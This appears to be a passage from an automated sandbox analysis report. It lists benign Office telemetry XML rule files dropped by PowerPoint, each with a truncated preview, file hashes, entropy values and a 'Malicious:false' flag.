                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false" N="EventTy
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1398
                                                                                                                              Entropy (8bit):4.8838124424443485
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9r6hDluct1k3BNjXMi+EsdnKE+2h6wl/FfcFE0Q8:ch6RlucteNjXMzbdKshBdEw8
                                                                                                                              MD5:6F8D4C93DABAB34519AF6CE90028BD0E
                                                                                                                              SHA1:291D8729727AE3850F464E41FE6D8771EB9F73DA
                                                                                                                              SHA-256:2B666C43A56D70270612CC47E012F9FD363C335C57191BD9FB682C2F83A56CB3
                                                                                                                              SHA-512:44C5C272681BFDF98364242A79969F9FBA7167207B6C33D43BED680BBD80184E84C35F4FD3045D622DACA9EEA39C210C7644E85983D229E718E1689C890F6558
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1373
                                                                                                                              Entropy (8bit):4.870676852445164
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9H6DiuMt1k3BNjXMi+EsdnKE+2h6wl/Ffb/R6:c1aiuMteNjXMzbdKshBdbR6
                                                                                                                              MD5:77B56E43D73FA188917E562B70842BFA
                                                                                                                              SHA1:652A37D897D870576A87E64474FCEE3149E87E00
                                                                                                                              SHA-256:0D9142E0149C9C142D3CD95DD8DC7138ACC43F42B9D0D6C5A8C1809055AC4BD6
                                                                                                                              SHA-512:CBBFDE5C510A9750E013B99857B293D564071937B1DBAABB28BC06AD0D8B260672B5908A69ACDC5D611FA5605606FFC36E13D41966C3DC1036B8D791961432CF
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="701100" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Accessibility" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenAccessibility" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1410
                                                                                                                              Entropy (8bit):4.9032649064965685
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d98CDiuct1k3BNjXMi+EsdnKE+2h6wl/Ffb/R6:cqCiucteNjXMzbdKshBdbR6
                                                                                                                              MD5:507BA271196503239BE13EE1BA321855
                                                                                                                              SHA1:99680772A05B7975AEBC04F9E8902A4702FF70F2
                                                                                                                              SHA-256:524B24FAC548B58AAA409B523C0AE670DB695BE965FF6B1DF40B5AC43DA1C6BC
                                                                                                                              SHA-512:A41C8754A818D799F076C6E571FD48C21596EAD3CB5DB77D89FFFA890FE1A8DD809BBB6BFA63280E54692187E6BA1F2034679BD42C597F036BFB3C2AE1F64F77
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="701101" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Accessibility.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenAccessibility" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo"
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1363
                                                                                                                              Entropy (8bit):4.859493863374326
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9yRDrouMt1k3BNjXMi+EsdnKE+2h6wl/Ffrk:cYhrouMteNjXMzbdKshBd4
                                                                                                                              MD5:2FB9137F9A1706197FB55DF8517A82C3
                                                                                                                              SHA1:C0FE0FC455F8AD087B533863410F6A9FFB5D0ACB
                                                                                                                              SHA-256:ECA6F8A4572C305B76ED9E7B7EC0AB299EBDD39B77EB63E2BDAB8AE87A3FE912
                                                                                                                              SHA-512:C6F1775B5583826E6C07F3F6476A4A173DFC25F0ED6731325D3867515B5C232AFD6994B7FB326944FE6A233B60C96B4439882179E569F98EDC99596C23288789
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false" N="Event
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1400
                                                                                                                              Entropy (8bit):4.8949038661110205
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d99bDrouct1k3BNjXMi+EsdnKE+2h6wl/Ffrk:cDnroucteNjXMzbdKshBd4
                                                                                                                              MD5:3A9820D070C1565C16916844FE33DA09
                                                                                                                              SHA1:8BA5B6149C4B36937D26220C57A407736A4B73DE
                                                                                                                              SHA-256:4B92B65AA0321B6707B143642440084C0B9A57E83CFC8A58555EE570FC2E0343
                                                                                                                              SHA-512:8BE95144D5D25EB6E74DE0A04A53E356F281DD8720C25929A4A0E82B4B9460FEEF72C8009BAD7ECCA4E782E91841D7075E74043225EAB4DE5161CE76D2E20684
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1355
                                                                                                                              Entropy (8bit):4.859306526630754
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9WuS0DguMt1k3BNjXMi+EsdnKE+2h6wl/FflwrkaMp:cwuPguMteNjXMzbdKshBdNMk
                                                                                                                              MD5:287129FFB36E1F7977F1A70ABBC8D7DF
                                                                                                                              SHA1:0C17106216B5637D5FC192BFF8F185E1045A278E
                                                                                                                              SHA-256:A4E20CA3E4F76D270BF165D6D607464CB344A2BF0C36009E84A68A3B0F37CE79
                                                                                                                              SHA-512:7BF495AFA6821BFD168EBB098ABC251288F16EF93C73202A77D74CFBADC0CF7417FA98144849577D81BD8358B687D69113CA4363D03DF16F01510A2D9C6E98FB
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false" N="EventTypeInfo
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1392
                                                                                                                              Entropy (8bit):4.894375938062735
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9RgDguct1k3BNjXMi+EsdnKE+2h6wl/FflwrkaMp:c7kgucteNjXMzbdKshBdNMk
                                                                                                                              MD5:CCABD847AAA5D7E103CEDBEF2A9EAD23
                                                                                                                              SHA1:F64D34258E147E8746925ED0BEB75FF664116F32
                                                                                                                              SHA-256:37ED0C183C6AC628BA7F6F7A8812D28B163ACA6597FD57C5E8673A878C254A34
                                                                                                                              SHA-512:F644163E2648F43F88DBCB0D460D878A70229B6046ED998E64278C663751FFC9EBFD420BAAE6C1A105FE982BD6043CB42E1D5F2927D96583FE593538157EBD69
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1357
                                                                                                                              Entropy (8bit):4.852145737506613
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9jxE7DVOuMt1k3BNjXMi+EsdnKE+2h6wl/Ff/Fv:ctaHEuMteNjXMzbdKshBd1
                                                                                                                              MD5:5EBEF9B192C8103FFDCCC72DD9EDAFD1
                                                                                                                              SHA1:8A4314B788DE4AD3E80759994F4AFBD8669D9A74
                                                                                                                              SHA-256:24A0BB2950AF30622B152250D0FB321AC92103D37E6361B2680ADBDEEE93FAA7
                                                                                                                              SHA-512:A488EB52EE5DC29DA021D38FA0A217075D064519C42590CB4BCB6DF31D1EB046FE95E6BAA6622E1C6DC600825F6B6E3D1CEDF4C16111987AF9206D06CBDAF570
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false" N="EventTypeIn
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1394
                                                                                                                              Entropy (8bit):4.887592597470845
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d94xCDVOuct1k3BNjXMi+EsdnKE+2h6wl/Ff/Fv:ciIEucteNjXMzbdKshBd1
                                                                                                                              MD5:41FAF032C1FFDADEB437507E63713EB1
                                                                                                                              SHA1:CD6DA1A22C070B1DA423F43A0CBB691D0262AE33
                                                                                                                              SHA-256:722C2A2B9D6ECD2D7823E518CCFEDCF5576BC23D187A8704B0D4C0BAA4C75DF9
                                                                                                                              SHA-512:1BC0B64B95DAF7C0E6947FBE264C55B53BCC2C29CB5C1BE90EAAC3F9F5FDF24A059A321567FAEAF986115C32A46EE34D831B9EA6E7822B8BB6F0FD3A5242B871
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1365
                                                                                                                              Entropy (8bit):4.853574157223617
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9puD+uMt1k3BNjXMi+EsdnKE+2h6wl/FfF5Mvj8+9:cTe+uMteNjXMzbdKshBd4jN
                                                                                                                              MD5:0071603D76F450E66200CE966EDDE2D9
                                                                                                                              SHA1:3127073FE22FC7154F7C708FC43EFF877CBE0292
                                                                                                                              SHA-256:BC2B76A72E5D0A52749E01239F95B757E75535B6C6B64D1FB8C9529E36AC0A96
                                                                                                                              SHA-512:5878E247DFA7C683D753FA68C438E9A34F0A10AE6B661C91C641475053A8402FC959B653F6F7F8D57BB34C26C4D584B2FE4A51F0A6F9B78882019BB851278ECB
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="701300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Licensing" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenLicensing" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false" N="Eve
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1402
                                                                                                                              Entropy (8bit):4.888179763188237
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9u0JD+uct1k3BNjXMi+EsdnKE+2h6wl/FfF5Mvj8+9:co0Z+ucteNjXMzbdKshBd4jN
                                                                                                                              MD5:5116C3B1152C0D2A5F8D815C5AF0CBDA
                                                                                                                              SHA1:7D441291A22AAC03BA9BE6A21DD4C828CA276356
                                                                                                                              SHA-256:D14D9A1F4F46C9D62315414C36514B70CE6FF6D2348ECA4E9CA189F670EF2939
                                                                                                                              SHA-512:2FF0D0D11CBA4E80EDB7BC7CA7101840BF62C11C44BD973D518A34D27EB5A6FA9372A7361061B1A0CC73768BB83F4F97F5E00A82DC4D09C5C5AEF0703A3362F4
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="701301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Licensing.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenLicensing" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1369
                                                                                                                              Entropy (8bit):4.862955605597379
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9UEDAuMt1k3BNjXMi+EsdnKE+2h6wl/FfFUZC:cGYAuMteNjXMzbdKshBd9T
                                                                                                                              MD5:8D4222D4E369261410799F61C69AD049
                                                                                                                              SHA1:A71B914EF1706C027F653386CB311138486748D5
                                                                                                                              SHA-256:BD87BF4A112F0856EB0709D3F455C5FF05BDDB91532912639CFB1C05897A838F
                                                                                                                              SHA-512:CAEE9ED333E79578E603902DCA35FEE216540C769EDBA17E157535B5FF0659AB5087A04CF050DB3E72825F8E2B00954F6304398A9F1A2F925BD0C3C3BD6EC507
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="701350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false" N=
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1406
                                                                                                                              Entropy (8bit):4.8974766228830156
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9fIDAuct1k3BNjXMi+EsdnKE+2h6wl/FfFUZC:cBMAucteNjXMzbdKshBd9T
                                                                                                                              MD5:93A2B72717297C77249A66A699AE28A8
                                                                                                                              SHA1:E7EADA3ACB405CAFD9EAA452F86EAD27F201C255
                                                                                                                              SHA-256:60D1D22F84121CA3F9FCEF5F6072BD2F813945B33D30358BA2ED325495B63CDE
                                                                                                                              SHA-512:5E9B9206D1379F936984BD46420C1F8112C8265F2F1EBE58BF7B6930FBCB418AEFDEE4D6D38260080E0706EE8EF80D5EDCEFCE9727E600B8E5BF5CCA96D25B32
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1363
                                                                                                                              Entropy (8bit):4.859497537258701
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9AF7DPuMt1k3BNjXMi+EsdnKE+2h6wl/FfSoiD:cG5PuMteNjXMzbdKshBdqoiD
                                                                                                                              MD5:49DF4E9962115C2F2744C11B74C1F9C0
                                                                                                                              SHA1:C39F235ECA2C756CC1FD01CA7E906925076A1613
                                                                                                                              SHA-256:7F5E0293010B58D70ED1FE59D9B3C44AEBDCFC81697C2EDFB0835576E787233B
                                                                                                                              SHA-512:C88FFEAC935D37B2AE8C709D55442AA387C7EBFC8B8E1C9D69193BA915251E3FB7655C82A7A25A884FCA593E98D194B856E29280A3E7DC227138CB326FABDC53
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="701400" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Feedback" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenFeedback" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false" N="Event
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
